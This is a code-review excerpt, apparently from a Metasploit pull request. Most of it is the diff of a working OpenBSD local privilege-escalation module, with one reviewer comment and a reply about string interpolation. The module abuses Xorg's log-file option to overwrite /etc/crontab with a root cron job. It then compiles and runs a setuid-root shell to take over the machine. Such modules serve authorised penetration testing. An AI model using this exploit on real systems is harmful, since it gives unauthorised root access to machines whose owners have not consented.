modules/exploits/openbsd/local/xorg_x11_suid_server.rb

```diff
@@ -0,0 +1,173 @@
+      else
+        vprint_good('Xorg does not appear running')
+        return CheckCode::Detected
+    end
+  end
+
+
+  def exploit
+    check_status = check
+    unless check_status == CheckCode::Detected
+       fail_with Failure::NotVulnerable, 'Target not vulnerable'
+    end
+    if is_root?
+      fail_with Failure::BadConfig, 'This session already has root privileges'
+    end
+
+    # Defines path to script that will chmod the payload
+    builtin_only = datastore['BUILTIN']
+    payload_path = datastore['PAYLOAD_LOC']
+    pscript = "#{datastore['SCRIPT']}.session-#{rand_text_alphanumeric 5..10}"
+    payload_c = "#{pscript}.c"
+
+    #File crontab will run
+    cron_script = ''
+    # Upload for the text payloads
+    if builtin_only == false
+      print_status 'Uploading your payload'
+      cron_script << payload.encoded.gsub('"', '\"').gsub('$', '\$')
+      write_file(pscript,cron_script)
+      vprint_status cron_script
+    else
+      print_good 'Attempting privesc within current session'
+      cron_script << "cp /bin/sh #{payload_path}\n"
+      cron_script << "gcc #{payload_c} -o #{payload_path}\n"
+      cron_script << "chmod 4777 #{payload_path}\n"
+      suid_c = 'main(){setuid(0);setgid(0);system("/bin/sh");}'
+      write_file(pscript,cron_script)
+      vprint_status cron_script
+      write_file(payload_c,suid_c)
+      vprint_status suid_c
+      register_file_for_cleanup payload_c
+      register_file_for_cleanup payload_path
+    end
+    register_file_for_cleanup pscript
+    chmod pscript
+
+    # Exploit steps on crontab so backing it up
+    cmd_exec "cat /etc/crontab > #{pscript}.b"
+
+    # Actual exploit with cron overwrite
+    print_status 'Trying /etc/crontab overwrite'
+    cmd_exec "cd /etc ; Xorg -fp '* * * * * root #{pscript}' -logfile crontab :1 & >/dev/null"
+    Rex.sleep 5
+    cmd_exec "pkill Xorg"
+    Rex.sleep 5
+    cron_check = cmd_exec "egrep #{pscript} /etc/crontab"
+    unless cron_check.include? pscript
+      fail_with Failure::NotVulnerable, '/etc/crontab not modified'
+    end
+    print_good '/etc/crontab overwrite successful'
+
+    i = 0
+    while i < 12
+      print_status 'Waiting on cron to run'
+      Rex.sleep 10
+      i += 1
+      break if exists? payload_path
+      break unless exists? pscript      # will be cleaned up on successful exploit
+    end
+
+    #Time to become root and clean up a little
+    if builtin_only == true
+      print_good 'Payload written..executing'
+      cmd_exec payload_path
+      if is_root?
+        print_good 'Your session now has root privileges'
+        print_good 'Cleaning up and restoring crontab entries'
+        cmd_exec "cat #{pscript}.b > /etc/crontab"
+        rm_f "/etc/crontab.old"
+      end
+    else
+      Rex.sleep 2
+      print_status "This scripts' session does not have root"
+      print_warning 'You have some clean-up to do in new session'
+      print_warning 'cat #{pscript}.b > /etc/crontab ; rm -f #{pscript}.*'
```

Comment:
Double quotes are required for string interpolation:

```suggestion
      print_warning "cat #{pscript}.b > /etc/crontab ; rm -f #{pscript}.*"
```

Reply:
Yes, didn't mean for this to get reviewed again quite yet.  I probably triggered a review accidentally.  This has been fixed.